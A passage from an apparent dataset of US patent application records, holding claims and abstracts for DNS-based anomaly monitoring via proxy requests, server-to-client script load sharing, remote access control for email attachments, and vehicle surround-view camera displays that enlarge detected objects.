determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 17. The system of claim 16, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 18. The system of claim 15, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 19. The system of claim 15, wherein the hostname is included in a Uniform Resource Locator (URL). 20. The system of claim 15, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. | This specification generally relates to methods and systems for applying network policies to devices based on their current access network. One example method includes identifying a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with the computer identified by the hostname on behalf of the client device; determining an identity of the client device based on the proxy connection request; identifying a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request; and updating DNS usage information for the particular client based on the identified DNS response including the hostname from the proxy connection request.1. A computer-implemented method executed by one or more processors, the method comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network; identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network; determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 2. The method of claim 1, wherein identifying the DNS response including the hostname includes:
sending the DNS request including the hostname from the proxy connection request; and receiving the DNS response. 3. The method of claim 1, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 4. The method of claim 1, wherein the hostname is included in a Uniform Resource Locator (URL). 5. The method of claim 1, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. 6. The method of claim 1, further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 7. The method of claim 6, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 8. A non-transitory, computer-readable medium storing instructions operable when executed to cause at least one processor to perform operations comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network; identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network; determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 9. The non-transitory, computer-readable medium of claim 8, the operations further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 10. The non-transitory, computer-readable medium of claim 9, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 11. The non-transitory, computer-readable medium of claim 8, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 12. The non-transitory, computer-readable medium of claim 8, wherein the hostname is included in a Uniform Resource Locator (URL). 13. The non-transitory, computer-readable medium of claim 8, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. 14. The non-transitory, computer-readable medium of claim 8, wherein identifying the DNS response including the hostname includes:
sending the DNS request including the hostname from the proxy connection request; and receiving the DNS response. 15. A system comprising:
memory for storing data; and one or more processors operable to perform operations comprising:
identifying, by a monitoring device, a proxy connection request sent from a particular client device to a proxy server over a network, the proxy connection request including a hostname and configured to direct the proxy server to establish communication with a computer identified by the hostname on behalf of the client device, wherein the monitoring device is separate from the client device and the proxy server, and wherein the monitoring device receives the proxy connection request from the network;
identifying, by the monitoring device, a domain name system (DNS) response to a DNS request including the hostname from the proxy connection request, wherein the DNS request is sent by the proxy server in response to the proxy connection request from the particular client device, and wherein the monitoring device receives the DNS response from the network;
determining, by the monitoring device, that the DNS response is associated with the particular client device based on the DNS response including the hostname from the proxy connection request; and
in response to determining that the DNS response is associated with the particular client device, updating, by the monitoring device, DNS usage information for the particular client device based on the identified DNS response. 16. The system of claim 15, the operations further comprising:
determining that the particular client device is exhibiting anomalous behavior based on the updated DNS usage information; and performing a corrective action to the particular client device based on the determination. 17. The system of claim 16, wherein the anomalous behavior is associated with a malicious software program, and the corrective action includes removing the particular client device from the network. 18. The system of claim 15, wherein the DNS usage information includes a DNS request rate for the particular client device, a DNS request failure rate for the particular client device, and hostnames included in DNS requests associated with the particular client device. 19. The system of claim 15, wherein the hostname is included in a Uniform Resource Locator (URL). 20. The system of claim 15, wherein the DNS request is sent by the proxy server on behalf of the client device and in response to the proxy connection request. | 2,400 |
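The monitoring flow claimed above can be summarized in a short sketch: a monitoring device, separate from both client and proxy, observes (a) the client's proxy connection request carrying a hostname and (b) the proxy's later DNS response for that hostname, attributes the DNS activity back to the client, and updates per-client usage information. The class and field names below are assumptions for illustration.

```python
from collections import defaultdict

class DnsUsageMonitor:
    def __init__(self):
        self.pending = {}                     # hostname -> client id
        self.usage = defaultdict(lambda: {"requests": 0, "failures": 0,
                                          "hostnames": set()})

    def on_proxy_connect(self, client_id, hostname):
        # Step 1: proxy connection request observed on the network.
        self.pending[hostname] = client_id

    def on_dns_response(self, hostname, ok):
        # Steps 2-4: DNS response observed; associate it with the client
        # whose request carried the same hostname, then update usage info.
        client_id = self.pending.pop(hostname, None)
        if client_id is None:
            return
        stats = self.usage[client_id]
        stats["requests"] += 1
        stats["hostnames"].add(hostname)
        if not ok:
            stats["failures"] += 1

    def is_anomalous(self, client_id, max_failure_rate=0.5):
        # Claim 6: anomaly detection over the updated usage information,
        # here a simple failure-rate threshold (an assumed heuristic).
        s = self.usage[client_id]
        return s["requests"] > 0 and s["failures"] / s["requests"] > max_failure_rate

m = DnsUsageMonitor()
m.on_proxy_connect("client-a", "good.example")
m.on_dns_response("good.example", ok=True)
m.on_proxy_connect("client-a", "bad1.example")
m.on_dns_response("bad1.example", ok=False)
m.on_proxy_connect("client-a", "bad2.example")
m.on_dns_response("bad2.example", ok=False)
print(m.is_anomalous("client-a"))   # 2 failures out of 3 requests
```

The corrective action from claim 7 (removing the device from the network) would hang off a `True` result here; the sketch stops at detection.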
9,150 | 9,150 | 15,603,847 | 2,458 | Methods, devices and program products are provided for utilizing one or more processors to receive a request from a client device for a network responsive resource. The network responsive resource includes a substitute scripted component. The methods, devices and program products determine whether to implement load sharing based on utilization information indicative of a load and build the network responsive resource with a client-side scripted component as the substitute scripted component. | 1. A method, comprising:
utilizing one or more processors to perform the following: receiving a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determining whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, building the network responsive resource with a client-side scripted component as the substitute scripted component. 2. The method of claim 1, further comprising building the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 3. The method of claim 2, wherein the server-side scripted component represents a PHP scripted component executable by the resource manager. 4. The method of claim 1, wherein the substitute scripted component initially represents a server-side scripted component, the building including substituting the client-side scripted component for the server-side scripted component. 5. The method of claim 1, wherein the client-side scripted component represents a Java scripted component executable by a browser at a client device. 6. The method of claim 1, wherein the utilization information is indicative of the load experienced by a resource manager. 7. The method of claim 1, wherein the utilization information is indicative of the load experienced by a client device, the determining including determining to implement the load sharing based on the load experienced by the client device exceeding a device load threshold. 8. The method of claim 1, further comprising returning the network responsive resource to a client device; executing, at a browser of the client device, the client-side scripted component; and displaying the responsive resource with the browser of the client device. 9. A device, comprising:
one or more processors; memory storing instructions accessible by the processor; wherein, responsive to execution of the instructions, the one or more processors to: receive a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determine whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, build the network responsive resource with a client-side scripted component as the substitute scripted component. 10. The device of claim 9, wherein, responsive to execution of the instructions, the one or more processors to build the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 11. The device of claim 9, wherein the device comprises a server and wherein the server-side scripted component represents a PHP scripted component executed by the server. 12. The device of claim 9, wherein the memory stores the network responsive resource with a server-side scripted component as the substitute scripted component, and wherein, responsive to execution of the instructions, the one or more processors to substitute the client-side scripted component for the server-side scripted component. 13. The device of claim 9, wherein the utilization information is indicative of the load experienced by a resource manager. 14. The device of claim 9, wherein the utilization information is indicative of the load experienced by a client device, and wherein, responsive to execution of the instructions, the one or more processors to implement the load sharing based on the load experienced by the client device exceeding a device load threshold. 15. 
The device of claim 9, wherein the utilization information is indicative of loads experienced by a client device and a resource manager, and wherein, responsive to execution of the instructions, the one or more processors to implement the load sharing based on a relation between the loads experienced by the client device and the resource manager and corresponding device and manager load thresholds. 16. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to perform:
receiving a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determining whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, building the network responsive resource with a client-side scripted component as the substitute scripted component. 17. The computer program product of claim 16, further comprising building the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 18. The computer program product of claim 16, wherein the substitute scripted component initially represents a server-side scripted component, the building including substituting the client-side scripted component for the server-side scripted component. 19. The computer program product of claim 16, further comprising comparing the utilization information to a threshold and based on the comparing disabling an auto activation component within the network responsive resource. 20. The computer program product of claim 19, further comprising, based on the comparing, adding an activation query to the network responsive resource, the activation query to be presented in a display as an option to allow a user to activate the disabled auto activation component. | Methods, devices and program products are provided for utilizing one or more processors to receive a request from a client device for a network responsive resource. The network responsive resource includes a substitute scripted component. The methods, devices and program products determine whether to implement load sharing based on utilization information indicative of a load and build the network responsive resource with a client-side scripted component as the substitute scripted component.1. A method, comprising:
utilizing one or more processors to perform the following: receiving a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determining whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, building the network responsive resource with a client-side scripted component as the substitute scripted component. 2. The method of claim 1, further comprising building the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 3. The method of claim 2, wherein the server-side scripted component represents a PHP scripted component executable by the resource manager. 4. The method of claim 1, wherein the substitute scripted component initially represents a server-side scripted component, the building including substituting the client-side scripted component for the server-side scripted component. 5. The method of claim 1, wherein the client-side scripted component represents a Java scripted component executable by a browser at a client device. 6. The method of claim 1, wherein the utilization information is indicative of the load experienced by a resource manager. 7. The method of claim 1, wherein the utilization information is indicative of the load experienced by a client device, the determining including determining to implement the load sharing based on the load experienced by the client device exceeding a device load threshold. 8. The method of claim 1, further comprising returning the network responsive resource to a client device; executing, at a browser of the client device, the client-side scripted component; and displaying the responsive resource with the browser of the client device. 9. A device, comprising:
one or more processors; memory storing instructions accessible by the processor; wherein, responsive to execution of the instructions, the one or more processors to: receive a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determine whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, build the network responsive resource with a client-side scripted component as the substitute scripted component. 10. The device of claim 9, wherein, responsive to execution of the instructions, the one or more processors to build the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 11. The device of claim 9, wherein the device comprises a server and wherein the server-side scripted component represents a PHP scripted component executed by the server. 12. The device of claim 9, wherein the memory stores the network responsive resource with a server-side scripted component as the substitute scripted component, and wherein, responsive to execution of the instructions, the one or more processors to substitute the client-side scripted component for the server-side scripted component. 13. The device of claim 9, wherein the utilization information is indicative of the load experienced by a resource manager. 14. The device of claim 9, wherein the utilization information is indicative of the load experienced by a client device, and wherein, responsive to execution of the instructions, the one or more processors to implement the load sharing based on the load experienced by the client device exceeding a device load threshold. 15. 
The device of claim 9, wherein the utilization information is indicative of loads experienced by a client device and a resource manager, and wherein, responsive to execution of the instructions, the one or more processors to implement the load sharing based on a relation between the loads experienced by the client device and the resource manager and corresponding device and manager load thresholds. 16. A computer program product comprising a non-signal computer readable storage medium comprising computer executable code to perform:
receiving a request from a client device for a network responsive resource, the network responsive resource including a substitute scripted component; determining whether to implement load sharing based on utilization information indicative of a load; and in connection with implementing load sharing, building the network responsive resource with a client-side scripted component as the substitute scripted component. 17. The computer program product of claim 16, further comprising building the network responsive resource in a non-load sharing implementation by executing a server-side scripted component as the substitute scripted component. 18. The computer program product of claim 16, wherein the substitute scripted component initially represents a server-side scripted component, the building including substituting the client-side scripted component for the server-side scripted component. 19. The computer program product of claim 16, further comprising comparing the utilization information to a threshold and based on the comparing disabling an auto activation component within the network responsive resource. 20. The computer program product of claim 19, further comprising, based on the comparing, adding an activation query to the network responsive resource, the activation query to be presented in a display as an option to allow a user to activate the disabled auto activation component. | 2,400 |
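The load-sharing decision in the claims above reduces to a threshold check at build time: under load, substitute a client-side script for the server-side component; otherwise execute the server-side component while building the page. The threshold value and render strings below are illustrative assumptions.

```python
MANAGER_LOAD_THRESHOLD = 0.8  # assumed threshold for the resource manager

def run_server_side_component():
    # Non-load-sharing path: the substitute component is executed on the
    # server during the build (claim 2).
    return "<p>rendered on server</p>"

def build_responsive_resource(template, manager_load):
    if manager_load > MANAGER_LOAD_THRESHOLD:
        # Load sharing: ship a client-side script in place of the
        # server-side substitute component (claims 1 and 4), shifting
        # the rendering work to the client's browser.
        body = '<script src="render-component.js"></script>'
    else:
        body = run_server_side_component()
    return template.replace("{{component}}", body)

page = "<html>{{component}}</html>"
print(build_responsive_resource(page, manager_load=0.9))
print(build_responsive_resource(page, manager_load=0.3))
```

Claim 15's variant would compare both the client's and the manager's loads against their respective thresholds before choosing a branch; the sketch keeps only the single-threshold case.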
9,151 | 9,151 | 15,846,675 | 2,457 | Various examples for remotely controlling access to email resources are provided. In one example, one or more computing devices can be configured to provide, through an access control service, at least one user interface that enables creation of resource rules configured for use by the access control service in enforcement on one or more client devices in association with email resources. In response to input received through the at least one user interface of the access control service, the one or more computing devices can generate a resource rule that directs a client application on a client device to open an attachment of one of the email resources in an authorized secure container application. | 1. A system for remotely controlling access to an email resource, comprising:
at least one computing device comprising at least one hardware processor; and program instructions stored in memory that, when executed by the at least one hardware processor, direct the at least one computing device to:
provide, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources;
in response to input received through the at least one user interface, generate the at least one resource rule on the at least one computing device; and
direct, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 2. The system of claim 1, further comprising program instructions that, when executed, direct the at least one computing device to, in response to the at least one resource rule being generated, modify the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 3. The system of claim 2, wherein the one of the plurality of email resources is modified by encrypting at least a portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 4. The system of claim 2, wherein the one of the plurality of email resources is modified by removing at least a portion of the one of the plurality of email resources prior to encryption. 5. The system of claim 1, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 6. The system of claim 1, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 7. 
The system of claim 1, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. 8. A non-transitory computer-readable medium for remotely controlling access to an email resource embodying program code executable by at least one computing device that, when executed by the at least one computing device, causes the at least one computing device to:
provide, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources; in response to input received through the at least one user interface, generate the at least one resource rule on the at least one computing device; and direct, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 9. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to, in response to the at least one resource rule being generated, modify the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 10. The non-transitory computer-readable medium of claim 9, wherein the one of the plurality of email resources is modified by encrypting at least a portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 11. The non-transitory computer-readable medium of claim 9, wherein the one of the plurality of email resources is modified by removing at least a portion of the one of the plurality of email resources prior to encryption. 12. The non-transitory computer-readable medium of claim 8, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 13. 
The non-transitory computer-readable medium of claim 8, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 14. The non-transitory computer-readable medium of claim 8, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. 15. A method for remotely controlling access to an email resource comprising:
providing, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources; generating, in response to input received through the at least one user interface, the at least one resource rule on the at least one computing device; and directing, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 16. The method of claim 15, further comprising, in response to the at least one resource rule being generated, modifying the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 17. The method of claim 16, wherein the one of the plurality of email resources is modified by:
removing a first portion of the one of the plurality of email resources prior to encryption; and encrypting a second portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 18. The method of claim 15, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 19. The method of claim 15, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 20. The method of claim 15, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. | Various examples for remotely controlling access to email resources are provided. In one example, one or more computing devices can be configured to provide, through an access control service, at least one user interface that enables creation of resource rules configured for use by the access control service in enforcement of one or more client devices in association with email resources. In response to input received through the at least one user interface of the access control service, the one or more computing devices can generate a resource rule that directs a client application on a client device to open an attachment of one of the email resources in an authorized secure container application.1. A system for remotely controlling access to an email resource, comprising:
at least one computing device comprising at least one hardware processor; and program instructions stored in memory that, when executed by the at least one hardware processor, direct the at least one computing device to:
provide, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources;
in response to input received through the at least one user interface, generate the at least one resource rule on the at least one computing device; and
direct, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 2. The system of claim 1, further comprising program instructions that, when executed, direct the at least one computing device to, in response to the at least one resource rule being generated, modify the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 3. The system of claim 2, wherein the one of the plurality of email resources is modified by encrypting at least a portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 4. The system of claim 2, wherein the one of the plurality of email resources is modified by removing at least a portion of the one of the plurality of email resources prior to encryption. 5. The system of claim 1, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 6. The system of claim 1, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 7. 
The system of claim 1, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. 8. A non-transitory computer-readable medium for remotely controlling access to an email resource embodying program code executable by at least one computing device that, when executed by the at least one computing device, causes the at least one computing device to:
provide, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources; in response to input received through the at least one user interface, generate the at least one resource rule on the at least one computing device; and direct, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 9. The non-transitory computer-readable medium of claim 8, further comprising program code that, when executed, causes the at least one computing device to, in response to the at least one resource rule being generated, modify the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 10. The non-transitory computer-readable medium of claim 9, wherein the one of the plurality of email resources is modified by encrypting at least a portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 11. The non-transitory computer-readable medium of claim 9, wherein the one of the plurality of email resources is modified by removing at least a portion of the one of the plurality of email resources prior to encryption. 12. The non-transitory computer-readable medium of claim 8, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 13. 
The non-transitory computer-readable medium of claim 8, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 14. The non-transitory computer-readable medium of claim 8, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. 15. A method for remotely controlling access to an email resource comprising:
providing, through an access control service, at least one user interface that enables creation of at least one resource rule for enforcement on at least one client device in association with a plurality of email resources; generating, in response to input received through the at least one user interface, the at least one resource rule on the at least one computing device; and directing, based at least in part on the at least one resource rule, a client application executable on the at least one client device to open an attachment of one of the plurality of email resources in an authorized secure container application executable on the at least one client device. 16. The method of claim 15, further comprising, in response to the at least one resource rule being generated, modifying the one of the plurality of email resources such that the one of the plurality of email resources can only be opened in the authorized secure container application. 17. The method of claim 16, wherein the one of the plurality of email resources is modified by:
removing a first portion of the one of the plurality of email resources prior to encryption; and encrypting a second portion of the email resource using a cryptographic key, wherein the cryptographic key is provided to the authorized secure container application from the access control service. 18. The method of claim 15, wherein the authorized secure container application is configured to disable at least one of: a cut function, a copy function, a paste function, a screen capture function, a share function, and a print function on the at least one client device. 19. The method of claim 15, wherein the client application is directed based at least in part on the at least one resource rule to open the attachment of the one of the plurality of email resources in the authorized secure container application in response to receiving the at least one resource rule on the at least one client device from the access control service. 20. The method of claim 15, wherein the authorized secure container application is configured to prevent at least one unauthorized application executable by the client device from accessing data within a data store associated with the secure container application. | 2,400 |
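The record above describes an access control service that generates resource rules directing a client application to open email attachments only in an authorized secure container application. The following is a minimal, hypothetical sketch of that rule-and-direction flow, not the patented implementation: all names (`ResourceRule`, `AccessControlService`, `app_for_attachment`, the app identifiers) are invented for illustration, rule creation stands in for the claimed user interface, and the encryption/modification of the email resource is omitted.

```python
# Hypothetical model of the claimed flow: a service generates resource rules,
# and the client is directed to open matching attachments in the authorized
# secure container application. Names and structure are illustrative only.
from dataclasses import dataclass, field

@dataclass(frozen=True)
class ResourceRule:
    # Attachments with these extensions must open in the secure container.
    container_required_extensions: frozenset
    authorized_container: str = "secure-container-app"

@dataclass
class AccessControlService:
    rules: list = field(default_factory=list)

    def create_rule(self, extensions):
        # Stands in for rule creation through the claimed user interface.
        rule = ResourceRule(container_required_extensions=frozenset(extensions))
        self.rules.append(rule)
        return rule

def app_for_attachment(filename, rules, default_app="native-viewer"):
    """Direct the client application: which app may open this attachment?"""
    ext = "." + filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    for rule in rules:
        if ext in rule.container_required_extensions:
            return rule.authorized_container
    return default_app

service = AccessControlService()
service.create_rule({".pdf", ".docx"})
print(app_for_attachment("report.pdf", service.rules))  # secure-container-app
print(app_for_attachment("notes.txt", service.rules))   # native-viewer
```

A fuller model would also cover claims 3-4 (encrypting part of the resource with a key the service provisions to the container) and claim 5 (disabling cut/copy/paste/screen-capture inside the container), which this sketch leaves out.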
9,152 | 9,152 | 16,392,036 | 2,486 | A vehicular vision system includes a plurality of cameras disposed at a vehicle and having respective exterior fields of view, and a display screen for displaying images derived from captured image data in a surround view format where captured image data is merged to provide a single composite display image from a virtual viewing position. A control includes a processor that processes image data captured by the cameras to detect an object present in the field of view of at least one of the cameras. During a driving maneuver of the vehicle, the display screen displays surround view video images and responsive to detection of the object, the display screen displays an enlarged view of the detected object. | 1. A vehicular vision system comprising:
a plurality of cameras disposed at a vehicle equipped with the vehicular vision system and having respective exterior fields of view, the plurality of cameras comprising a forward viewing camera having at least a forward field of view, a rearward viewing camera having at least a rearward field of view, a driver-side sideward viewing camera at a driver side of the equipped vehicle and having at least a sideward field of view, and a passenger-side sideward viewing camera at a passenger side of the equipped vehicle and having at least a sideward field of view; a display screen for displaying video images derived from image data captured by the plurality of cameras in a surround view format where image data captured by the plurality of cameras is merged to provide a single composite display image representative of a view from a virtual viewing position; a control comprising a processor for processing image data captured by the plurality of cameras; wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects an object present in the field of view of at least one camera of the plurality of cameras; wherein, during a driving maneuver of the equipped vehicle, the display screen displays surround view video images derived from image data captured by the plurality of cameras; and wherein, during the driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays an enlarged view of the detected object. 2. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, centers the virtual viewing position on the detected object. 3. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, displays multiple images in a split screen format. 4. 
The vehicular vision system of claim 3, wherein the displayed multiple images comprise at least two displayed images of the detected object. 5. The vehicular vision system of claim 1, wherein the display screen displays the enlarged view of the detected object while also continuing to display a non-enlarged view of the detected object in the displayed surround view video images. 6. The vehicular vision system of claim 5, wherein the display screen displays the enlarged view of the detected object and the surround view video images in a split screen format. 7. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the displayed detected object. 8. The vehicular vision system of claim 1, wherein the vehicular vision system, responsive to detection by the control of the object, highlights the detected object via a color change in the displayed images of the detected object. 9. The vehicular vision system of claim 1, wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of detected objects in separate respective enlarged views of the respective detected objects. 10. The vehicular vision system of claim 1, comprising a gesture sensing device operable to sense a gesture made by a driver of the equipped vehicle, wherein, responsive at least in part to determination, via the gesture sensing device, of a gesture made by the driver, the control adjusts at least one selected from the group consisting of (i) the virtual viewing position for the displayed composite image and (ii) a virtual viewing angle of the displayed composite image from the virtual viewing position. 11. 
The vehicular vision system of claim 10, wherein the control calculates the virtual viewing position or the virtual viewing angle in real time without use of precalculated mapping tables. 12. The vehicular vision system of claim 10, wherein the control adjusts the displayed images responsive to detection by the gesture sensing device of one or more fingers of a hand of the driver touching and moving at a touch screen of the gesture sensing device. 13. The vehicular vision system of claim 10, wherein the gesture sensing device comprises at least one of (i) a time of flight sensor, (ii) at least one camera having a field of view interior of the equipped vehicle, (iii) a single camera having a field of view interior of the equipped vehicle and comprising motion disparity detection, and (iv) two cameras having fields of view interior of the equipped vehicle and comprising stereo camera disparity detection. 14. The vehicular vision system of claim 10, wherein, responsive to a determination by the gesture sensing device of a head movement made by the driver of the equipped vehicle, the control adjusts a virtual viewing location of the displayed images. 15. A vehicular vision system comprising:
at least one camera disposed at a vehicle equipped with the vehicular vision system and having a respective exterior field of view, the at least one camera comprising a rearward viewing camera having at least a rearward field of view; a display screen for displaying video images derived from image data captured by the at least one camera; a control comprising a processor for processing image data captured by the at least one camera; wherein the control, responsive to processing at the control of image data captured by the at least one camera, detects an object present in the field of view of the at least one camera; wherein, during a reverse driving maneuver of the equipped vehicle, the display screen displays rearward view video images derived from image data captured by the at least one camera; and wherein, during the reverse driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays in a split screen format (i) an enlarged view of the detected object and (ii) the rearward view video images. 16. The vehicular vision system of claim 15, wherein the vehicular vision system, responsive to detection by the control of the object, centers a virtual viewing position on the detected object. 17. The vehicular vision system of claim 15, wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the displayed images of the detected object. 18. The vehicular vision system of claim 15, wherein the control, responsive to processing at the control of image data captured by the at least one camera, detects a plurality of objects, and wherein the display screen, responsive to detection by the control of the plurality of objects, displays the plurality of detected objects in separate respective enlarged views of the respective detected objects. 19. A vehicular vision system comprising:
a plurality of cameras disposed at a vehicle equipped with the vehicular vision system and having respective exterior fields of view, the plurality of cameras comprising a forward viewing camera having at least a forward field of view, a rearward viewing camera having at least a rearward field of view, a driver-side sideward viewing camera at a driver side of the equipped vehicle and having at least a sideward field of view, and a passenger-side sideward viewing camera at a passenger side of the equipped vehicle and having at least a sideward field of view; a display screen for displaying video images derived from image data captured by the plurality of cameras in a surround view format where image data captured by the plurality of cameras is merged to provide a single composite display image representative of a view from a virtual viewing position; a control comprising a processor for processing image data captured by the plurality of cameras; wherein the control, responsive to processing at the control of image data captured by the plurality of cameras, detects an object present in the field of view of at least one camera of the plurality of cameras; wherein, during a driving maneuver of the equipped vehicle, the display screen displays surround view video images derived from image data captured by the plurality of cameras; wherein, during the driving maneuver of the equipped vehicle, and responsive to detection by the control of the object present in the field of view of the at least one camera, the display screen displays multiple images in a split screen format, and wherein the displayed multiple images comprise at least the single composite display image and an enlarged view of the detected object; and wherein the vehicular vision system, responsive to detection by the control of the object, displays an overlay at the detected object in at least one of the displayed multiple images. 20. 
